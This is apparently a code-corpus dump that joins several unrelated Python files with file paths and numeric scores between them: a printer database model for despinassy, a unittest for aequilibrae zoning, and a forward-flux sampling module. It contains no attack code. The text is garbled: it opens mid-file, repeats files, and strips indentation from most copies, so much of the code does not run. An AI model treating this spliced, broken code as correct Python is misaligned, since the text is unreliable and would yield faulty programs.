    For instance if a printer of type `PrinterTypeEnum.STATIC` is not connected
    this boolean will be listed as false.
    """
    width = db.Column(db.Integer)
    """Width of the output"""
    height = db.Column(db.Integer)
    """Height of the output"""
    dialect = db.Column(db.Enum(PrinterDialectEnum), nullable=False)
    """
    Print form of the output of the printer.
    See :class:`despinassy.Printer.PrinterDialectEnum` for more information.
    """
    name = db.Column(db.String(50), nullable=False)
    """User defined common name for this printer"""
    redis_id = db.Column(db.Integer, db.ForeignKey("channel.id"))
    # Assignment is coerced by validate_redis(): a channel *name* may be
    # assigned and is resolved to (or created as) a Channel row.
    redis = relationship("Channel")
    """Channel the printer listen for incoming message"""
    settings = db.Column(db.JSON)
    """Settings dependant on printer type"""
    transactions = relationship(
        "PrinterTransaction",
        order_by="desc(PrinterTransaction.created_at)",
        back_populates="printer",
    )
    """List of transaction sent to this printer"""
    hidden = db.Column(db.Boolean, default=False)
    """Is the printer hidden to the user."""
    # Timestamps maintained on insert / update respectively.
    created_at = db.Column(db.DateTime, default=datetime.datetime.utcnow)
    updated_at = db.Column(db.DateTime, onupdate=datetime.datetime.utcnow)
@validates("redis")
def validate_redis(self, key, value):
    """Coerce a channel *name* assigned to `redis` into a Channel row.

    Fetches an existing Channel by name or creates one; on a
    unique-constraint race, rolls back and re-fetches the row created by
    the concurrent writer.
    """
    c = Channel.query.filter(Channel.name == value)
    if c.count():
        c = c.first()
    else:
        try:
            c = Channel(name=value)
            db.session.add(c)
            db.session.commit()
        except IntegrityError:
            # Another session inserted the same name concurrently.
            db.session.rollback()
            c = Channel.query.filter(Channel.name == value).first()
    return c
def to_dict(self, full=False):
    """Serialize this printer to a plain dict.

    :param full: when True, include the serialized transaction history
        under the "transactions" key.
    """
    # Build the shared fields once instead of duplicating two near-identical
    # dict literals (the original diverged only by "transactions").
    result = {
        "id": self.id,
        "type": self.type,
        "available": self.available,
        "width": self.width,
        "height": self.height,
        "dialect": self.dialect,
        "name": self.name,
        "redis": str(self.redis),
        "settings": json.loads(self.settings),
    }
    if full:
        # Inserted here to keep key order identical to the historical output.
        result["transactions"] = [t.to_dict() for t in self.transactions]
    result.update(
        {
            "created_at": self.created_at,
            "updated_at": self.updated_at,
            "hidden": self.hidden,
        }
    )
    return result
def add_transaction(self, **kwargs):
    """Helper to create a new :class:`despinassy.Printer.PrinterTransaction`
    Someone should always use this helper function to create a new
    :class:`despinassy.Printer.PrinterTransaction` instead of creating
    one by hand.
    """
    # Touch updated_at so the printer reflects its latest activity.
    self.updated_at = datetime.datetime.utcnow()
    pt = PrinterTransaction(printer=self, **kwargs)
    # NOTE(review): the new row is not added to the session here — callers
    # appear responsible for db.session.add/commit; confirm.
    return pt
def __repr__(self):
    """Debug representation: id, type, name, channel and settings."""
    template = "<Printer id=%i type=%i name='%s' redis='%s' settings='%s'>"
    fields = (self.id, self.type, self.name, str(self.redis), self.settings)
    return template % fields
class PrinterTransaction(db.Model):
    """
    The `PrinterTransaction` model code representing the messages sent
    to a :class:`despinassy.Printer.Printer`.
    The transaction of a printer can either be control messages or print query
    to output content like parts from the printer.
    """
    __tablename__ = "printer_transaction"
    id = db.Column(db.Integer, primary_key=True, autoincrement=True)
    printer_id = db.Column(db.Integer, db.ForeignKey("printer.id"))
    printer = relationship("Printer")
    """:class:`despinassy.Printer.Printer` where the transaction happened"""
    # part_id = db.Column(db.Integer, db.ForeignKey('part.id'), unique=True)
    # part = relationship('Part')
    # NOTE(review): undocumented — presumably the channel/queue the message
    # was addressed to; confirm against the message producers.
    destination = db.Column(db.String(50))
    origin = db.Column(db.Enum(IpcOrigin), nullable=False)
    """
    Device that created this transaction.
    See :class:`despinassy.ipc.IpcOrigin` for more information.
    """
    device = db.Column(db.String(50))
    """
    String precising the origin of the originator of the transaction.
    """
    msg_type = db.Column(db.Integer, default=IpcMessageType.PRINT)
    """
    Type of the message received by the printer.
    See :class:`despinassy.ipc.IpcOrigin` for more information.
    """
    barcode = db.Column(db.String(50), nullable=False)
    """Barcode of the part the message refer to"""
    name = db.Column(db.String(120), nullable=False)
    """Name of the part the message refer to"""
    number = db.Column(db.Integer, default=1)
    """Number of output required by the printer"""
    created_at = db.Column(db.DateTime, default=datetime.datetime.utcnow)
def to_dict(self):
return {
"id": self.id,
"barcode": self.barcode,
"name": self.name,
"number": self.number,
"origin": self.origin,
"device": self.device,
"created_at": self.created_at,
} | despinassy/Printer.py | from despinassy.db import db
from despinassy.ipc import IpcOrigin, IpcMessageType
from despinassy.Channel import Channel
from sqlalchemy.orm import relationship, validates
from sqlalchemy.exc import IntegrityError
from enum import IntEnum
import datetime
import json
class PrinterDialectEnum(IntEnum):
"""
List the currently supported printer dialect for printer device to output.
"""
UNDEFINED = 0
"""Not defined dialect"""
ZEBRA_ZPL = 1
"""The Zebra ZPL printing language"""
TEST_JSON = 2
"""Output as JSON object"""
@staticmethod
def from_extension(extension: str):
"""Return dialect from file extension.
:param extension: String representing the extension of the dialect.
"""
if extension == "zpl":
return PrinterDialectEnum.ZEBRA_ZPL
elif extension == "json":
return PrinterDialectEnum.TEST_JSON
else:
return PrinterDialectEnum.UNDEFINED
class PrinterTypeEnum(IntEnum):
"""
List the currently supported type of printer device.
"""
UNDEFINED = 0
"""Not defined printer"""
STDOUT = 1
"""Print to the terminal"""
TEST = 2
"""Printer type used only on test case"""
STATIC = 3
"""Network printer with a static IP address"""
class Printer(db.Model):
"""
The `Printer` model code.
Printers entry are devices that can output parts in a defined dialect.
This model holds the information about this output device.
A `Printer` can either be something virtual that will just output the
result to a console or a physical device like a Zebra sticker printer.
"""
__tablename__ = "printer"
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
type = db.Column(db.Enum(PrinterTypeEnum), nullable=False)
"""
Type of printer device. See :class:`despinassy.Printer.PrinterTypeEnum` for
more information.
"""
available = db.Column(db.Boolean)
"""
Whether or not the `Printer` is currently available to print something.
For instance if a printer of type `PrinterTypeEnum.STATIC` is not connected
this boolean will be listed as false.
"""
width = db.Column(db.Integer)
"""Width of the output"""
height = db.Column(db.Integer)
"""Height of the output"""
dialect = db.Column(db.Enum(PrinterDialectEnum), nullable=False)
"""
Print form of the output of the printer.
See :class:`despinassy.Printer.PrinterDialectEnum` for more information.
"""
name = db.Column(db.String(50), nullable=False)
"""User defined common name for this printer"""
redis_id = db.Column(db.Integer, db.ForeignKey("channel.id"))
redis = relationship("Channel")
"""Channel the printer listen for incoming message"""
settings = db.Column(db.JSON)
"""Settings dependant on printer type"""
transactions = relationship(
"PrinterTransaction",
order_by="desc(PrinterTransaction.created_at)",
back_populates="printer",
)
"""List of transaction sent to this printer"""
hidden = db.Column(db.Boolean, default=False)
"""Is the printer hidden to the user."""
created_at = db.Column(db.DateTime, default=datetime.datetime.utcnow)
updated_at = db.Column(db.DateTime, onupdate=datetime.datetime.utcnow)
@validates("redis")
def validate_redis(self, key, value):
c = Channel.query.filter(Channel.name == value)
if c.count():
c = c.first()
else:
try:
c = Channel(name=value)
db.session.add(c)
db.session.commit()
except IntegrityError:
db.session.rollback()
c = Channel.query.filter(Channel.name == value).first()
return c
def to_dict(self, full=False):
if full:
return {
"id": self.id,
"type": self.type,
"available": self.available,
"width": self.width,
"height": self.height,
"dialect": self.dialect,
"name": self.name,
"redis": str(self.redis),
"settings": json.loads(self.settings),
"transactions": [t.to_dict() for t in self.transactions],
"created_at": self.created_at,
"updated_at": self.updated_at,
"hidden": self.hidden,
}
else:
return {
"id": self.id,
"type": self.type,
"available": self.available,
"width": self.width,
"height": self.height,
"dialect": self.dialect,
"name": self.name,
"redis": str(self.redis),
"settings": json.loads(self.settings),
"created_at": self.created_at,
"updated_at": self.updated_at,
"hidden": self.hidden,
}
def add_transaction(self, **kwargs):
"""Helper to create a new :class:`despinassy.Printer.PrinterTransaction`
Someone should always use this helper function to create a new
:class:`despinassy.Printer.PrinterTransaction` instead of creating
one by hand.
"""
self.updated_at = datetime.datetime.utcnow()
pt = PrinterTransaction(printer=self, **kwargs)
return pt
def __repr__(self):
return "<Printer id=%i type=%i name='%s' redis='%s' settings='%s'>" % (
self.id,
self.type,
self.name,
str(self.redis),
self.settings,
)
class PrinterTransaction(db.Model):
"""
The `PrinterTransaction` model code representing the messages sent
to a :class:`despinassy.Printer.Printer`.
The transaction of a printer can either be control messages or print query
to output content like parts from the printer.
"""
__tablename__ = "printer_transaction"
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
printer_id = db.Column(db.Integer, db.ForeignKey("printer.id"))
printer = relationship("Printer")
""":class:`despinassy.Printer.Printer` where the transaction happened"""
# part_id = db.Column(db.Integer, db.ForeignKey('part.id'), unique=True)
# part = relationship('Part')
destination = db.Column(db.String(50))
origin = db.Column(db.Enum(IpcOrigin), nullable=False)
"""
Device that created this transaction.
See :class:`despinassy.ipc.IpcOrigin` for more information.
"""
device = db.Column(db.String(50))
"""
String precising the origin of the originator of the transaction.
"""
msg_type = db.Column(db.Integer, default=IpcMessageType.PRINT)
"""
Type of the message received by the printer.
See :class:`despinassy.ipc.IpcOrigin` for more information.
"""
barcode = db.Column(db.String(50), nullable=False)
"""Barcode of the part the message refer to"""
name = db.Column(db.String(120), nullable=False)
"""Name of the part the message refer to"""
number = db.Column(db.Integer, default=1)
"""Number of output required by the printer"""
created_at = db.Column(db.DateTime, default=datetime.datetime.utcnow)
def to_dict(self):
return {
"id": self.id,
"barcode": self.barcode,
"name": self.name,
"number": self.number,
"origin": self.origin,
"device": self.device,
"created_at": self.created_at,
} | 0.771757 | 0.352425 |
from warnings import warn
from math import sqrt
from uuid import uuid4
from random import randint
from shutil import copytree, rmtree
from os.path import join
from tempfile import gettempdir
from unittest import TestCase
from shapely.geometry import Point, MultiPolygon
import shapely.wkb
from aequilibrae import Project
from ...data import siouxfalls_project
from aequilibrae.utils.create_example import create_example
class TestZone(TestCase):
def setUp(self) -> None:
    """Copy the Sioux Falls fixture project into a temp dir and open it."""
    self.temp_proj_folder = join(gettempdir(), uuid4().hex)
    copytree(siouxfalls_project, self.temp_proj_folder)
    self.proj = Project()
    self.proj.open(self.temp_proj_folder)
def tearDown(self) -> None:
    """Close the project and best-effort remove the temp folder."""
    self.proj.close()
    try:
        rmtree(self.temp_proj_folder)
    except Exception as e:
        # Cleanup is best-effort (e.g. lingering file locks); warn only.
        warn(f'Error: {e.args}')
def test_delete(self):
    """Deleting a zone removes it; a subsequent get must raise ValueError."""
    zones = self.proj.zoning
    zone_downtown = zones.get(3)
    zone_downtown.delete()
    with self.assertRaises(ValueError):
        _ = zones.get(3)
def test_save(self):
zones = self.proj.zoning
zn = zones.get(2)
area = randint(0, 9999999999)
zn.area = area
zn.save()
curr = self.proj.conn.cursor()
curr.execute('Select area from Zones where zone_id=2')
self.assertEqual(curr.fetchone()[0], area, "Zone didn't save area properly")
geo = Point(0, 0).buffer(1)
zn.geometry = geo
zn.save()
curr = self.proj.conn.cursor()
curr.execute('Select asBinary(geometry) from Zones where zone_id=2')
wkb = curr.fetchone()[0]
self.assertEqual(shapely.wkb.loads(wkb), MultiPolygon([geo]), "Zone didn't save geometry properly")
zn2 = zones.get(1)
geo = MultiPolygon([Point(0, 0).buffer(1)])
zn2.geometry = geo
zn2.save()
curr = self.proj.conn.cursor()
curr.execute('Select asBinary(geometry) from Zones where zone_id=1')
wkb = curr.fetchone()[0]
self.assertEqual(shapely.wkb.loads(wkb), geo, "Zone didn't save geometry properly")
def __change_project(self):
self.proj.close()
self.proj = Project()
self.proj = create_example(join(gettempdir(), uuid4().hex), 'nauru')
zones = 5
network = self.proj.network
nodes = network.nodes
geo = network.convex_hull()
zone_area = geo.area / zones
zone_side = sqrt(2 * sqrt(3) * zone_area / 9)
extent = network.extent()
curr = self.proj.conn.cursor()
b = extent.bounds
curr.execute('select st_asbinary(HexagonalGrid(GeomFromWKB(?), ?, 0, GeomFromWKB(?)))',
[extent.wkb, zone_side, Point(b[2], b[3]).wkb])
grid = curr.fetchone()[0]
grid = shapely.wkb.loads(grid)
grid = [p for p in grid if p.intersects(geo)]
zoning = self.proj.zoning
for i, zone_geo in enumerate(grid):
zone = zoning.new(i + 1)
zone.geometry = zone_geo
zone.save()
node = nodes.get(i + 1)
node.renumber(i + 10001)
def test_add_centroid(self):
self.__change_project()
zones = self.proj.zoning
nodes = self.proj.network.nodes
network = self.proj.network
zone1 = zones.get(1)
tot = network.count_centroids()
zone1.add_centroid(None)
self.assertEqual(tot + 1, network.count_centroids(), "Added less than it should've")
tot = network.count_centroids()
zone1.add_centroid(None)
zone1.add_centroid(Point(0, 0))
self.assertEqual(tot, network.count_centroids(), "Added more than should've")
node1 = nodes.get(1)
self.assertEqual(node1.geometry, zone1.geometry.centroid)
zone2 = zones.get(2)
zone2.add_centroid(Point(0, 0))
node2 = nodes.get(2)
self.assertEqual(node2.geometry, Point(0, 0))
def test_connect_mode(self):
self.__change_project()
curr = self.proj.conn.cursor()
zones = self.proj.zoning
zone1 = zones.get(1)
zone1.add_centroid(None)
zone1.connect_mode('c')
curr.execute('Select count(*) from links where a_node=?', [1])
self.assertIsNot(0, curr.fetchone()[0], 'failed to add connectors')
zone1.connect_mode('t')
curr.execute('''Select count(*) from links where a_node=? and instr(modes,'t')>0''', [1])
self.assertIsNot(0, curr.fetchone()[0], 'failed to add connectors for mode t')
# Cannot connect a centroid that does not exist
with self.assertRaises(ValueError):
zone2 = zones.get(2)
zone2.connect_mode('c')
def test_disconnect_mode(self):
self.__change_project()
curr = self.proj.conn.cursor()
zones = self.proj.zoning
zone1 = zones.get(1)
zone1.add_centroid(None)
zone1.connect_mode('c')
zone1.connect_mode('w')
curr.execute('''select COUNT(*) from links where a_node=1''')
tot = curr.fetchone()[0]
curr.execute('''Update links set modes = modes || 'w' where instr(modes,'w')=0''')
self.proj.conn.commit()
zone1.disconnect_mode('w')
curr.execute('''select COUNT(*) from links where a_node=1''')
self.assertIsNot(tot, curr.fetchone()[0], 'failed to delete links')
curr.execute('''Select count(*) from links where a_node=1 and instr(modes,'w')>0''')
self.assertEqual(curr.fetchone()[0], 0, 'Failed to remove mode from all connectors') | tests/aequilibrae/project/test_zone.py | from warnings import warn
from math import sqrt
from uuid import uuid4
from random import randint
from shutil import copytree, rmtree
from os.path import join
from tempfile import gettempdir
from unittest import TestCase
from shapely.geometry import Point, MultiPolygon
import shapely.wkb
from aequilibrae import Project
from ...data import siouxfalls_project
from aequilibrae.utils.create_example import create_example
class TestZone(TestCase):
def setUp(self) -> None:
self.temp_proj_folder = join(gettempdir(), uuid4().hex)
copytree(siouxfalls_project, self.temp_proj_folder)
self.proj = Project()
self.proj.open(self.temp_proj_folder)
def tearDown(self) -> None:
self.proj.close()
try:
rmtree(self.temp_proj_folder)
except Exception as e:
warn(f'Error: {e.args}')
def test_delete(self):
zones = self.proj.zoning
zone_downtown = zones.get(3)
zone_downtown.delete()
with self.assertRaises(ValueError):
_ = zones.get(3)
def test_save(self):
zones = self.proj.zoning
zn = zones.get(2)
area = randint(0, 9999999999)
zn.area = area
zn.save()
curr = self.proj.conn.cursor()
curr.execute('Select area from Zones where zone_id=2')
self.assertEqual(curr.fetchone()[0], area, "Zone didn't save area properly")
geo = Point(0, 0).buffer(1)
zn.geometry = geo
zn.save()
curr = self.proj.conn.cursor()
curr.execute('Select asBinary(geometry) from Zones where zone_id=2')
wkb = curr.fetchone()[0]
self.assertEqual(shapely.wkb.loads(wkb), MultiPolygon([geo]), "Zone didn't save geometry properly")
zn2 = zones.get(1)
geo = MultiPolygon([Point(0, 0).buffer(1)])
zn2.geometry = geo
zn2.save()
curr = self.proj.conn.cursor()
curr.execute('Select asBinary(geometry) from Zones where zone_id=1')
wkb = curr.fetchone()[0]
self.assertEqual(shapely.wkb.loads(wkb), geo, "Zone didn't save geometry properly")
def __change_project(self):
self.proj.close()
self.proj = Project()
self.proj = create_example(join(gettempdir(), uuid4().hex), 'nauru')
zones = 5
network = self.proj.network
nodes = network.nodes
geo = network.convex_hull()
zone_area = geo.area / zones
zone_side = sqrt(2 * sqrt(3) * zone_area / 9)
extent = network.extent()
curr = self.proj.conn.cursor()
b = extent.bounds
curr.execute('select st_asbinary(HexagonalGrid(GeomFromWKB(?), ?, 0, GeomFromWKB(?)))',
[extent.wkb, zone_side, Point(b[2], b[3]).wkb])
grid = curr.fetchone()[0]
grid = shapely.wkb.loads(grid)
grid = [p for p in grid if p.intersects(geo)]
zoning = self.proj.zoning
for i, zone_geo in enumerate(grid):
zone = zoning.new(i + 1)
zone.geometry = zone_geo
zone.save()
node = nodes.get(i + 1)
node.renumber(i + 10001)
def test_add_centroid(self):
self.__change_project()
zones = self.proj.zoning
nodes = self.proj.network.nodes
network = self.proj.network
zone1 = zones.get(1)
tot = network.count_centroids()
zone1.add_centroid(None)
self.assertEqual(tot + 1, network.count_centroids(), "Added less than it should've")
tot = network.count_centroids()
zone1.add_centroid(None)
zone1.add_centroid(Point(0, 0))
self.assertEqual(tot, network.count_centroids(), "Added more than should've")
node1 = nodes.get(1)
self.assertEqual(node1.geometry, zone1.geometry.centroid)
zone2 = zones.get(2)
zone2.add_centroid(Point(0, 0))
node2 = nodes.get(2)
self.assertEqual(node2.geometry, Point(0, 0))
def test_connect_mode(self):
self.__change_project()
curr = self.proj.conn.cursor()
zones = self.proj.zoning
zone1 = zones.get(1)
zone1.add_centroid(None)
zone1.connect_mode('c')
curr.execute('Select count(*) from links where a_node=?', [1])
self.assertIsNot(0, curr.fetchone()[0], 'failed to add connectors')
zone1.connect_mode('t')
curr.execute('''Select count(*) from links where a_node=? and instr(modes,'t')>0''', [1])
self.assertIsNot(0, curr.fetchone()[0], 'failed to add connectors for mode t')
# Cannot connect a centroid that does not exist
with self.assertRaises(ValueError):
zone2 = zones.get(2)
zone2.connect_mode('c')
def test_disconnect_mode(self):
self.__change_project()
curr = self.proj.conn.cursor()
zones = self.proj.zoning
zone1 = zones.get(1)
zone1.add_centroid(None)
zone1.connect_mode('c')
zone1.connect_mode('w')
curr.execute('''select COUNT(*) from links where a_node=1''')
tot = curr.fetchone()[0]
curr.execute('''Update links set modes = modes || 'w' where instr(modes,'w')=0''')
self.proj.conn.commit()
zone1.disconnect_mode('w')
curr.execute('''select COUNT(*) from links where a_node=1''')
self.assertIsNot(tot, curr.fetchone()[0], 'failed to delete links')
curr.execute('''Select count(*) from links where a_node=1 and instr(modes,'w')>0''')
self.assertEqual(curr.fetchone()[0], 0, 'Failed to remove mode from all connectors') | 0.52975 | 0.472136 |
import sys
import time
import attr
import numpy as np
import tqdm
from .utils import stat_str
class FFSampler:
pass
@attr.s
class FFInterface:
order = attr.ib(type=float)
states = attr.ib(factory=list)
log10_rate = attr.ib(0.0)
s_up = attr.ib(0)
s_down = attr.ib(0)
s_timeout = attr.ib(0)
def up_flow(self):
return (self.s_up / max(self.s_up + self.s_down, 1))
def __repr__(self):
return f"<{self.__class__.__name__}({self.order:.4g}) {len(self.states)} samples, {self.s_up}U {self.s_down}D {self.s_timeout}TO, rate {self.rate:.3g}>"
def reset_counts(self):
self.s_up = 0
self.s_down = 0
self.s_timeout = 0
class FFSampler:
def __init__(self, init_states, interfaces, iface_samples=100):
self.init_states = init_states
self.iface_samples = iface_samples
self.interfaces = [
iface if isinstance(iface, FFInterface) else FFInterface(iface) for iface in interfaces
]
self.ifaceA = self.interfaces[0]
self.ifaceB = self.interfaces[-1]
def compute(self, progress=True, report_degs=False, timeout=100.0, dynamic_ifaces=False, stop_rate=None):
self.sample_interface_A(progress=progress, timeout=timeout)
print(f"Rate at iface A ({self.ifaceA.order}) is {10 ** self.ifaceA.log10_rate:.3g} ups/MCSS/spin")
step = 10
maxstep = max((self.ifaceB.order - self.ifaceA.order) // 20, 1)
ino = 1
while True:
prev = self.interfaces[ino - 1]
if not dynamic_ifaces:
iface = self.interfaces[ino]
else:
its = 0
last_dir = 0
while True:
iface = FFInterface(min(prev.order + step, self.ifaceB.order))
ok = self.sample_interface(iface, prev=prev, progress=False, timeout=timeout, iface_samples=10, max_timeouts=1)
upflow = prev.up_flow()
if not ok:
print(f" .. failed to estimate step at {iface.order}, too many timeouts (upflow {upflow:.3f}, step {step})")
prev.reset_counts()
if False and its > 0:
print(f" .. tried {iface.order} (step {step}), upflow {upflow:.3f}")
its += 1
if upflow >= 0.5 and step < maxstep and its < 10 and last_dir >= 0:
step = min(max(int(step * 2), step + 1), maxstep)
last_dir = 1
continue
elif upflow <= 0.15 and step > 1 and its < 10:
step = step * 2 // 3
last_dir = -1
continue
elif iface.order == self.ifaceB.order:
iface = self.ifaceB
break
else:
self.interfaces.insert(-1, FFInterface(iface.order))
iface = self.interfaces[ino]
break
self.sample_interface(iface, prev=prev, progress=progress, timeout=timeout)
s = f"done {ino}/{len(self.interfaces)} ifaces [{iface.order}]"
if dynamic_ifaces:
s = f"done [{iface.order}/{self.ifaceB.order}]"
up_norm = prev.up_flow() ** (1 / (iface.order - prev.order))
print(f" {s}, up flow {prev.up_flow():.3f} (normalized {up_norm:.3f}), rate 10^{iface.log10_rate:.3f}={10**iface.log10_rate:.3g}, " +
f"orders {stat_str([s.get_order() for s in iface.states], True)}")
ino += 1
if dynamic_ifaces and self.ifaceB == iface:
break
if (not dynamic_ifaces) and ino == len(self.interfaces):
break
if stop_rate is not None and stop_rate > iface.log10_rate:
print(f" Rate below stop_rate 10^{stop_rate:.3f}, stopping")
break
def sample_interface_A(self, progress, timeout):
up_times = []
a = self.ifaceA.order
if progress:
pb = tqdm.tqdm(range(self.iface_samples),
f"Iface A ({a:.2f}) rate",
dynamic_ncols=True,
leave=False,
file=progress if progress is not True else sys.stderr)
state = None
t_up = None
timeouts = 0
while min(len(up_times), len(self.ifaceA.states)) < self.iface_samples:
if progress:
pb.set_postfix_str(f"times {stat_str(up_times, True)}, {timeouts} TOs")
pb.display()
if state is None:
t_up = None
state = np.random.choice(self.init_states).copy()
state.seed = np.random.randint(1 << 60)
# Update to be <A
state.update_until(a, 1 << 30, timeout=timeout)
if state.get_order() >= a:
state = None
timeouts += 1
if t_up is not None:
up_times.append(timeout)
continue
# Update to be >=A
state.update_until(0, self.ifaceA.order, timeout=timeout)
if state.get_order() < a:
state = None
timeouts += 1
if t_up is not None:
up_times.append(timeout)
continue
if t_up is not None:
up_times.append(state.updates - t_up)
t_up = state.updates
self.ifaceA.states.append(state.copy())
if progress:
pb.update(min(len(up_times), len(self.ifaceA.states)) - pb.n)
self.ifaceA.log10_rate = np.log10(1.0 / np.mean(up_times) / state.n)
if progress:
pb.update(min(len(up_times), len(self.ifaceA.states)) - pb.n)
pb.close()
print(pb)
def sample_interface(self, iface, prev, progress, timeout, iface_samples=None, max_timeouts=None):
"Return False on too many timeouts"
if iface_samples is None:
iface_samples = self.iface_samples
if progress:
pb = tqdm.tqdm(range(iface_samples),
f"Iface {iface.order:8.2f}",
dynamic_ncols=True,
leave=False,
file=progress if progress is not True else sys.stderr)
while len(iface.states) < iface_samples:
# Select clustering seed for this pop
state = np.random.choice(prev.states).copy()
state.seed = np.random.randint(1 << 60)
state.update_until(self.ifaceA.order, iface.order, timeout=timeout)
if state.get_order() < self.ifaceA.order:
prev.s_down += 1
elif state.get_order() >= iface.order:
prev.s_up += 1
iface.states.append(state.copy())
else:
prev.s_timeout += 1
if max_timeouts is not None and prev.s_timeout >= max_timeouts:
return False
if progress:
pb.update(len(iface.states) - pb.n)
pb.set_postfix_str(f"{prev.s_up:>3}U {prev.s_down:>3}D {prev.s_timeout:>3}TO")
if progress:
pb.update(len(iface.states) - pb.n)
pb.close()
print(pb)
iface.log10_rate = prev.log10_rate + np.log10(prev.up_flow())
return True
def critical_order_param(self):
last_r = self.ifaceB.log10_rate
if last_r == 0.0:
return None
for ino, iface in enumerate(self.interfaces):
if iface.log10_rate < last_r + np.log10(2.0):
break
if ino == 0:
return 0.0
prev = self.interfaces[ino - 1]
# print(f"Locating {last_r * 2.0} in {prev.rate} .. {iface.rate} ({prev.order} .. {iface.order})")
la = prev.log10_rate
lx = last_r + np.log10(2.0)
lb = iface.log10_rate
return ((lx - la) * iface.order + (lb - lx) * prev.order) / (lb - la) | netising/forward_flux.py | import sys
import time
import attr
import numpy as np
import tqdm
from .utils import stat_str
class FFSampler:
pass
@attr.s
class FFInterface:
order = attr.ib(type=float)
states = attr.ib(factory=list)
log10_rate = attr.ib(0.0)
s_up = attr.ib(0)
s_down = attr.ib(0)
s_timeout = attr.ib(0)
def up_flow(self):
return (self.s_up / max(self.s_up + self.s_down, 1))
def __repr__(self):
return f"<{self.__class__.__name__}({self.order:.4g}) {len(self.states)} samples, {self.s_up}U {self.s_down}D {self.s_timeout}TO, rate {self.rate:.3g}>"
def reset_counts(self):
self.s_up = 0
self.s_down = 0
self.s_timeout = 0
class FFSampler:
def __init__(self, init_states, interfaces, iface_samples=100):
self.init_states = init_states
self.iface_samples = iface_samples
self.interfaces = [
iface if isinstance(iface, FFInterface) else FFInterface(iface) for iface in interfaces
]
self.ifaceA = self.interfaces[0]
self.ifaceB = self.interfaces[-1]
def compute(self, progress=True, report_degs=False, timeout=100.0, dynamic_ifaces=False, stop_rate=None):
self.sample_interface_A(progress=progress, timeout=timeout)
print(f"Rate at iface A ({self.ifaceA.order}) is {10 ** self.ifaceA.log10_rate:.3g} ups/MCSS/spin")
step = 10
maxstep = max((self.ifaceB.order - self.ifaceA.order) // 20, 1)
ino = 1
while True:
prev = self.interfaces[ino - 1]
if not dynamic_ifaces:
iface = self.interfaces[ino]
else:
its = 0
last_dir = 0
while True:
iface = FFInterface(min(prev.order + step, self.ifaceB.order))
ok = self.sample_interface(iface, prev=prev, progress=False, timeout=timeout, iface_samples=10, max_timeouts=1)
upflow = prev.up_flow()
if not ok:
print(f" .. failed to estimate step at {iface.order}, too many timeouts (upflow {upflow:.3f}, step {step})")
prev.reset_counts()
if False and its > 0:
print(f" .. tried {iface.order} (step {step}), upflow {upflow:.3f}")
its += 1
if upflow >= 0.5 and step < maxstep and its < 10 and last_dir >= 0:
step = min(max(int(step * 2), step + 1), maxstep)
last_dir = 1
continue
elif upflow <= 0.15 and step > 1 and its < 10:
step = step * 2 // 3
last_dir = -1
continue
elif iface.order == self.ifaceB.order:
iface = self.ifaceB
break
else:
self.interfaces.insert(-1, FFInterface(iface.order))
iface = self.interfaces[ino]
break
self.sample_interface(iface, prev=prev, progress=progress, timeout=timeout)
s = f"done {ino}/{len(self.interfaces)} ifaces [{iface.order}]"
if dynamic_ifaces:
s = f"done [{iface.order}/{self.ifaceB.order}]"
up_norm = prev.up_flow() ** (1 / (iface.order - prev.order))
print(f" {s}, up flow {prev.up_flow():.3f} (normalized {up_norm:.3f}), rate 10^{iface.log10_rate:.3f}={10**iface.log10_rate:.3g}, " +
f"orders {stat_str([s.get_order() for s in iface.states], True)}")
ino += 1
if dynamic_ifaces and self.ifaceB == iface:
break
if (not dynamic_ifaces) and ino == len(self.interfaces):
break
if stop_rate is not None and stop_rate > iface.log10_rate:
print(f" Rate below stop_rate 10^{stop_rate:.3f}, stopping")
break
def sample_interface_A(self, progress, timeout):
up_times = []
a = self.ifaceA.order
if progress:
pb = tqdm.tqdm(range(self.iface_samples),
f"Iface A ({a:.2f}) rate",
dynamic_ncols=True,
leave=False,
file=progress if progress is not True else sys.stderr)
state = None
t_up = None
timeouts = 0
while min(len(up_times), len(self.ifaceA.states)) < self.iface_samples:
if progress:
pb.set_postfix_str(f"times {stat_str(up_times, True)}, {timeouts} TOs")
pb.display()
if state is None:
t_up = None
state = np.random.choice(self.init_states).copy()
state.seed = np.random.randint(1 << 60)
# Update to be <A
state.update_until(a, 1 << 30, timeout=timeout)
if state.get_order() >= a:
state = None
timeouts += 1
if t_up is not None:
up_times.append(timeout)
continue
# Update to be >=A
state.update_until(0, self.ifaceA.order, timeout=timeout)
if state.get_order() < a:
state = None
timeouts += 1
if t_up is not None:
up_times.append(timeout)
continue
if t_up is not None:
up_times.append(state.updates - t_up)
t_up = state.updates
self.ifaceA.states.append(state.copy())
if progress:
pb.update(min(len(up_times), len(self.ifaceA.states)) - pb.n)
self.ifaceA.log10_rate = np.log10(1.0 / np.mean(up_times) / state.n)
if progress:
pb.update(min(len(up_times), len(self.ifaceA.states)) - pb.n)
pb.close()
print(pb)
def sample_interface(self, iface, prev, progress, timeout, iface_samples=None, max_timeouts=None):
"Return False on too many timeouts"
if iface_samples is None:
iface_samples = self.iface_samples
if progress:
pb = tqdm.tqdm(range(iface_samples),
f"Iface {iface.order:8.2f}",
dynamic_ncols=True,
leave=False,
file=progress if progress is not True else sys.stderr)
while len(iface.states) < iface_samples:
# Select clustering seed for this pop
state = np.random.choice(prev.states).copy()
state.seed = np.random.randint(1 << 60)
state.update_until(self.ifaceA.order, iface.order, timeout=timeout)
if state.get_order() < self.ifaceA.order:
prev.s_down += 1
elif state.get_order() >= iface.order:
prev.s_up += 1
iface.states.append(state.copy())
else:
prev.s_timeout += 1
if max_timeouts is not None and prev.s_timeout >= max_timeouts:
return False
if progress:
pb.update(len(iface.states) - pb.n)
pb.set_postfix_str(f"{prev.s_up:>3}U {prev.s_down:>3}D {prev.s_timeout:>3}TO")
if progress:
pb.update(len(iface.states) - pb.n)
pb.close()
print(pb)
iface.log10_rate = prev.log10_rate + np.log10(prev.up_flow())
return True
def critical_order_param(self):
last_r = self.ifaceB.log10_rate
if last_r == 0.0:
return None
for ino, iface in enumerate(self.interfaces):
if iface.log10_rate < last_r + np.log10(2.0):
break
if ino == 0:
return 0.0
prev = self.interfaces[ino - 1]
# print(f"Locating {last_r * 2.0} in {prev.rate} .. {iface.rate} ({prev.order} .. {iface.order})")
la = prev.log10_rate
lx = last_r + np.log10(2.0)
lb = iface.log10_rate
return ((lx - la) * iface.order + (lb - lx) * prev.order) / (lb - la) | 0.327561 | 0.169131 |
import sys
import cv2 as cv
